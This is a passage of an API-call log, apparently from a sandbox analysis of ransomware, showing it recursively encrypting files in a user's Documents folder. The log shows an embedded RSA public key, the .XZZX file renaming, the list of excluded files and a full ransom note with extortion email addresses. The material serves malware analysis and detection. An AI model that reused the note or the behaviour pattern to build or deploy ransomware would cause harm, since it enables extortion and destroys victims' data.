lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1164 [0232.477] Sleep (dwMilliseconds=0x96) [0232.632] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.632] lstrcmpW (lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpString2="..") returned 1 [0232.633] lstrcmpW (lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpString2=".") returned 1 [0232.633] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.633] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="ntldr") returned 0x0 [0232.633] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="NTLDR") returned 0x0 [0232.633] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.633] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.633] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.633] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.633] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.633] lstrcpyW (in: lpString1=0x17be7c, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0232.633] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1168 [0232.633] Sleep (dwMilliseconds=0x96) [0232.788] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.789] lstrcmpW (lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpString2="..") returned 1 [0232.789] lstrcmpW (lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpString2=".") returned 1 [0232.789] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.789] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="ntldr") returned 0x0 [0232.789] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="NTLDR") returned 0x0 [0232.789] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.789] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.789] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.789] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.789] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.789] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.789] lstrcpyW (in: lpString1=0x17be7c, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0232.789] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x116c [0232.789] Sleep (dwMilliseconds=0x96) [0232.944] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0232.944] lstrcmpW (lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpString2="..") returned 1 [0232.945] lstrcmpW (lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpString2=".") returned 1 [0232.945] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0232.945] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="ntldr") returned 0x0 [0232.945] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="NTLDR") returned 0x0 [0232.945] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0232.945] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="ntdetect.com") returned 0x0 [0232.945] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0232.945] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0232.945] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0232.945] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0232.945] lstrcpyW (in: lpString1=0x17be7c, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0232.945] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0232.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1170 [0232.945] Sleep (dwMilliseconds=0x96) [0233.100] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0233.100] lstrcmpW (lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX", lpString2="..") returned 1 [0233.100] lstrcmpW (lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX", lpString2=".") returned 1 [0233.101] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0233.101] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="ntldr") returned 0x0 [0233.101] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="NTLDR") returned 0x0 [0233.101] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0233.101] StrStrW (lpFirst="EE9B10B00F697CE4836159F013D6612C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0233.101] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0233.101] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0233.101] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0233.101] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.101] lstrcpyW (in: lpString1=0x17be7c, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0233.101] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0233.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1174 [0233.101] Sleep (dwMilliseconds=0x96) [0233.256] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0233.256] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0233.256] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0233.256] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0233.257] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0233.257] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0233.257] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0233.257] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0233.257] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0233.257] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0233.257] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*" [0233.257] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0233.257] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0233.257] SetErrorMode (uMode=0x1) returned 0x1 [0233.257] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT") returned 82 [0233.257] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0233.257] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0233.257] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x1178) returned 0x0 [0233.258] RegQueryValueExW (in: hKey=0x1178, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d3f98, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43d3f98*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0233.258] RegCloseKey (hKey=0x1178) returned 0x0 [0233.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0233.258] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0233.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1178 [0233.258] CloseHandle (hObject=0x1178) returned 1 [0233.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0233.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0233.258] lstrcpyW (in: lpString1=0x17b644, lpString2="lhhNd9leW5xmlXw00JFa" | out: lpString1="lhhNd9leW5xmlXw00JFa") returned="lhhNd9leW5xmlXw00JFa" [0233.258] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa" [0233.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0233.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpString2="IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0233.258] SetErrorMode (uMode=0x1) returned 0x1 [0233.258] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1" [0233.258] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.259] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0233.259] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*" [0233.259] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0233.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0233.259] lstrcpyW (in: lpString1=0x17a5a4, lpString2="IkpxUp8UshIgHl1" | out: lpString1="IkpxUp8UshIgHl1") returned="IkpxUp8UshIgHl1" [0233.259] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0233.259] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="ntldr") returned 0x0 [0233.259] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="NTLDR") returned 0x0 [0233.259] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0233.259] StrStrW (lpFirst="069C108614226DDA8ED0A1A1188F5222.XZZX", lpSrch="ntdetect.com") returned 0x0 [0233.260] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="Desktop") returned 0x0 [0233.260] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\", lpSrch="DESKTOP") returned 0x0 [0233.260] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned 81 [0233.260] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0233.260] lstrcpyW (in: lpString1=0x17addc, lpString2="069C108614226DDA8ED0A1A1188F5222.XZZX" | out: lpString1="069C108614226DDA8ED0A1A1188F5222.XZZX") returned="069C108614226DDA8ED0A1A1188F5222.XZZX" 